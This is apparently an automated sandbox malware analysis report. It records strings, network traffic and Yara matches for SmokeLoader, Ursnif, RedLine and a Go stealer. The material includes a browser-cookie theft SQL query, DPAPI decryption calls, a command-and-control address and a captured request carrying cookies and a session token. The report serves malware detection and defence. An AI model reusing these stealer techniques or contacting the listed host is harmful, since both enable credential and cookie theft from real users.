Source: explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=\|:\|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.yahoo.com (Yahoo)
Source: RegSvcs.exe, 0000002F.00000002.632210376.000000C0001BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\Crypt32.dllCryptUnprotectData.support.google.comwww.youtube.com:443www.youtube.com:443HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyNO_PROXYno_proxytcpwww.youtube.comws2_32.dll.appengine.google.com.origin-test.bdn.dev.cloud.google.com.crowdsource.google.com.datacompute.google.com.googleadapis.com.googlevideo.com.googlecnapps.cngoogleapps-cn.com.googleapps-cn.comgoogledownloads.cn.googledownloads.cn.recaptcha.net.cn.recaptcha-cn.netampproject.org.cn.ampproject.org.cnampproject.net.cn.ampproject.net.cngoogle-analytics-cn.comgoogleadservices-cn.comgooglevads-cn.com.googlevads-cn.comgoogleapis-cn.com.googleapis-cn.comgoogleoptimize-cn.com.googleoptimize-cn.comdoubleclick-cn.net.doubleclick-cn.net.fls.doubleclick-cn.net.g.doubleclick-cn.net.fls.doubleclick.cn.g.doubleclick.cndartsearch-cn.net.dartsearch-cn.netgoogletagservices-cn.comgoogletagmanager-cn.comgooglesyndication-cn.comapp-measurement-cn.com.app-measurement-cn.comgoogleflights-cn.net.googleflights-cn.netgooglesandbox-cn.com.googlesandbox-cn.com.metric.gstatic.com.gcpcdn.gvt1.com.youtube-nocookie.com.flash.android.comgoogle-analytics.com.google-analytics.comgooglecommerce.com.googlecommerce.comyoutubeeducation.com.youtubeeducation.com.youtubekids.comsource.android.google.cncrypt32.dllCertGetCertificateChain.appengine.google.com.origin-test.bdn.dev.cloud.google.com.crowdsource.google.com.datacompute.google.com.googleadapis.com.googlevideo.com.googlecnapps.cngoogleapps-cn.com.googleapps-cn.comgoogledownloads.cn.googledownloads.cn.recaptcha.net.cn.recaptcha-cn.netampproject.org.cn.ampproject.org.cnampproject.net.cn.ampproject.net.cngoogle-analytics-cn.comgoogleadservices-cn.comgooglevads-cn.com.googlevads-cn.comgoogleapis-cn.com.googleapis-cn.comgoogleoptimize-cn.com.googleoptimize-cn.comdoubleclick-cn.net.doubleclick-cn.net.fls.doubleclick-cn.net.g.doubleclick-cn.net.fls.doubleclick.cn.g.doubleclick.cndartsearch-cn.net.dartsearch-cn.netgoogletagservices-cn.comgoogletagmanager-cn.comgooglesyndication-cn.comapp-measurement-cn.com.app-measurement-cn.comgoogleflights-cn.net.googleflights-cn.netgooglesandbox-cn.com.googlesandbox-cn.com.metric.gstatic.com.gcpcdn.gvt1.com.youtube-nocookie.com.flash.android.comgoogle-analytics.com.google-analytics.comgooglecommerce.com.googlecommerce.comyoutubeeducation.com.youtubeeducation.com.youtubekids.comsource.android.google.cn65.21.213.208:3000 equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: flate: internal error: frame_goaway_has_streamframe_headers_pad_shortframe_rststream_bad_lengarbage collection scangcDrain phase incorrecthttp2: handler panickedhttp: request too largehttps://www.youtube.comindex out of range [%x]interrupted system callinvalid PrintableStringinvalid URI for requestinvalid escape sequenceinvalid m->lockedInt = invalid scalar encodingjson: cannot unmarshal left over markroot jobsmakechan: bad alignmentmalformed HTTP responsemissing port in addressmissing protocol schememissing type in runfinqmultipart: NextPart: %vnanotime returning zeronet/http: abort Handlernetwork not implementedno application protocolno space left on devicenon-zero reserved fieldoperation not permittedoperation not supportedpanic during preemptoffprocresize: invalid argreflect.Value.Interfacereflect.Value.NumMethodreflect.methodValueCallruntime: internal errorruntime: invalid type runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timeskipping Question Classspan has no free stackssql: database is closedstack growth after forksyntax error in patternsystem huge page size (text/css; charset=utf-8text/xml; charset=utf-8too many pointers (>10)truncated tag or lengthunexpected address typeunexpected map key typeunknown empty width argunknown error code 0x%xunpacking Question.Nameunpacking Question.Typeunsupported certificatevarint integer overflowwork.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version(?<=authuser=)[0-9]{1,2}116415321826934814453125582076609134674072265625Azerbaijan Standard TimeBangladesh Standard TimeCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32SnapshotGODEBUG sys/cpu: value "GetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard TimePRAGMA auto_vacuum = %d;PRAGMA synchronous = %s;Pacific SA Standard TimeRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeUS Eastern Standard Time", required CPU feature equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: got CONTINUATION for stream %d; expected stream %dhttp: putIdleConn: CloseIdleConnections was calledhttp: suspiciously long trailer after chunked bodyhttps://www.youtube.com/getAccountSwitcherEndpointmallocgc called with gcphase == _GCmarkterminationnet/http: HTTP/1.x transport connection broken: %vnet/http: Transport failed to read from server: %vnet/http: cannot rewind body after connection lossrecursive call during initialization - linker skewreflect.Value.Slice3: slice of unaddressable arrayruntime: unable to acquire - semaphore out of synctls: invalid signature by the server certificate: tls: received unexpected CertificateStatus messagex509: RSA public exponent is not a positive numberx509: invalid RDNSequence: invalid attribute valuex509: missing ASN.1 contents; use ParseCertificate(?<=INNERTUBE_CONTEXT_CLIENT_VERSION\":\").*?(?=\")JSON decoder out of sync - data changing underfoot?SELECT name, encrypted_value, host_key FROM cookiesScanState's Read should not be called. Use ReadRunecrypto/elliptic: Add was called on an invalid pointcrypto/tls: reserved ExportKeyingMaterial label: %sfatal: systemstack called from unexpected goroutinehttp2: invalid Transfer-Encoding request header: %qlimiterEvent.stop: invalid limiter event type foundpotentially overlapping in-use allocations detectedprotocol error: received %T before a SETTINGS frameruntime: netpoll: PostQueuedCompletionStatus failedsql/driver: couldn't convert %v (%T) into type boolsql: driver does not support read-only transactionstls: VerifyHostname called on TLS server connectiontls: server selected unsupported compression formattls: server's identity changed during renegotiationx509: certificate has expired or is not yet valid: Second return value of SQLite function must be errorcasfrom_Gscanstatus: gp->status is not in scan statecrypto/rsa: message too long for RSA public key sizedriver: skip fast-path; continue as if unimplementedhttp2: Transport readFrame error on conn %p: (%T) %vhttp: method cannot contain a Content-Length; got %qmallocgc called without a P or outside bootstrappingprotocol error: received DATA before a HEADERS frameruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Init equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.623396941.000000C0000AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.623527954.000000C0000BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/getAccountSwitcherEndpoint equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.630498328.000000C000120000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.633090312.000000C0001F2000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.631191063.000000C000144000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.632210376.000000C0001BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)

Source: unknown

HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 89192Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1668905810762&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=DAC8A2EE305D4BBA834A5F5CB6605BDF&dmnchg=1; SRCHD=AF=NOFORM; SUID=M; SRCHUSR=DOB=20221119; SRCHHPGUSR=SRCHLANG=en; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF

Source: unknown	HTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.253.33.200:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.21.195:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.13:443 -> 192.168.2.3:49906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49930 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Go Stealer

Source: Yara match	File source: 47.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5128, type: MEMORYSTR

Yara detected Ursnif

Source: Yara match	File source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000025.00000002.770728847.0000000000131000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.773922476.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5876, type: MEMORYSTR
Source: Yara match	File source: 11.3.cttgcew.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q4Z52wRd28.exe.970000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q4Z52wRd28.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cttgcew.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q4Z52wRd28.exe.960e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cttgcew.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.381680800.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00402C70 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,VirtualProtect,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,

Source: EB2B.exe, 0000001C.00000002.453471789.000000000084A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 32.3.F771.exe.9c6b90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.3.B4A7.exe.716f68.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.3.B4A7.exe.716f68.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.3.B4A7.exe.d290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.3.F771.exe.9c6b90.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.27a0ee8.5.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.B4A7.exe.716f68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.3.F771.exe.8c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.3.B4A7.exe.d290000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.880e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.27a0ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.B4A7.exe.716f68.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.3.B4A7.exe.d290000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.27a0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.3.B4A7.exe.716f68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.267a196.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.267b07e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.267b07e.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.27a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.3.B4A7.exe.716f68.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.267a196.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.F771.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.424634553.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.340457364.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000C.00000002.428145666.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001A.00000002.597295606.0000000000934000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.340166873.0000000000871000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.393611577.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000018.00000002.797855651.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
